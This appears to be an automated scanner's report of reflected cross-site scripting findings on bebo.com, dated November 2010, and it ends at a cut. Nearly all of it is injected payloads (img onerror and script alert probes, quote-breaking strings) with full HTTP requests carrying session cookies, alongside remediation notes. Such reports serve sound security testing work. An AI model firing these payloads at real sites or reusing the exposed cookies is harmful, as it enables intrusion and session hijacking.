The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3704"><img%20src%3da%20onerror%3dalert(1)>c709de1f9e0 was submitted in the REST URL parameter 2. This input was echoed as f3704"><img src=a onerror=alert(1)>c709de1f9e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aboutf3704"><img%20src%3da%20onerror%3dalert(1)>c709de1f9e0/help HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10855 Date: Mon, 15 Nov 2010 22:43:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e955d'%3bbd88673f7f6 was submitted in the REST URL parameter 2. This input was echoed as e955d';bd88673f7f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aboute955d'%3bbd88673f7f6/help HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10561 Date: Mon, 15 Nov 2010 22:43:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa620'%3ba89af79cc06 was submitted in the REST URL parameter 3. This input was echoed as fa620';a89af79cc06 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/about/helpfa620'%3ba89af79cc06 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10285 Date: Mon, 15 Nov 2010 22:43:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac466"><img%20src%3da%20onerror%3dalert(1)>17e95ffc512 was submitted in the REST URL parameter 3. This input was echoed as ac466"><img src=a onerror=alert(1)>17e95ffc512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about/helpac466"><img%20src%3da%20onerror%3dalert(1)>17e95ffc512 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10573 Date: Mon, 15 Nov 2010 22:43:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d960<img%20src%3da%20onerror%3dalert(1)>d77a0fb3b97 was submitted in the REST URL parameter 3. This input was echoed as 7d960<img src=a onerror=alert(1)>d77a0fb3b97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about/help7d960<img%20src%3da%20onerror%3dalert(1)>d77a0fb3b97 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10555 Date: Mon, 15 Nov 2010 22:43:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3970e'><script>alert(1)</script>66ea4f6749b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about/help3970e'><script>alert(1)</script>66ea4f6749b HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10479 Date: Mon, 15 Nov 2010 22:43:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c949'%3b7bd4a0a8560 was submitted in the REST URL parameter 2. This input was echoed as 3c949';7bd4a0a8560 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aol_auth3c949'%3b7bd4a0a8560 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10543 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 565cb'><script>alert(1)</script>09c8b7bebd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth565cb'><script>alert(1)</script>09c8b7bebd2 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10754 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5bd4<script>alert(1)</script>430c1f12055 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_authb5bd4<script>alert(1)</script>430c1f12055 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10736 Date: Mon, 15 Nov 2010 22:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/aol_authb5bd4<script>alert(1)</script>430c1f12055 page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30858"><img%20src%3da%20onerror%3dalert(1)>d3254f8f610 was submitted in the REST URL parameter 2. This input was echoed as 30858"><img src=a onerror=alert(1)>d3254f8f610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth30858"><img%20src%3da%20onerror%3dalert(1)>d3254f8f610 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10837 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3545e<script>alert(1)</script>0a64feb99b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth3545e<script>alert(1)</script>0a64feb99b0/sgo HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10772 Date: Mon, 15 Nov 2010 22:43:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/aol_auth3545e<script>alert(1)</script>0a64feb99b0/sgo page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64994'><script>alert(1)</script>dac45bd9912 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth64994'><script>alert(1)</script>dac45bd9912/sgo HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10790 Date: Mon, 15 Nov 2010 22:43:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3831'%3bdd152150edb was submitted in the REST URL parameter 2. This input was echoed as e3831';dd152150edb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/aol_authe3831'%3bdd152150edb/sgo HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10579 Date: Mon, 15 Nov 2010 22:43:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0756"><img%20src%3da%20onerror%3dalert(1)>5cf17fe1f0f was submitted in the REST URL parameter 2. This input was echoed as d0756"><img src=a onerror=alert(1)>5cf17fe1f0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_authd0756"><img%20src%3da%20onerror%3dalert(1)>5cf17fe1f0f/sgo HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10873 Date: Mon, 15 Nov 2010 22:43:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2ccda<img%20src%3da%20onerror%3dalert(1)>98fbc4b56ab was submitted in the REST URL parameter 3. This input was echoed as 2ccda<img src=a onerror=alert(1)>98fbc4b56ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth/sgo2ccda<img%20src%3da%20onerror%3dalert(1)>98fbc4b56ab HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10573 Date: Mon, 15 Nov 2010 22:43:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ee6"><img%20src%3da%20onerror%3dalert(1)>b80ea7e79f6 was submitted in the REST URL parameter 3. This input was echoed as 85ee6"><img src=a onerror=alert(1)>b80ea7e79f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/aol_auth/sgo85ee6"><img%20src%3da%20onerror%3dalert(1)>b80ea7e79f6 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10591 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d606'><script>alert(1)</script>04a06b6a2f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aol_auth/sgo5d606'><script>alert(1)</script>04a06b6a2f1 HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10497 Date: Mon, 15 Nov 2010 22:43:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7b2e'%3b90c2b54f2da was submitted in the REST URL parameter 3. This input was echoed as e7b2e';90c2b54f2da in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
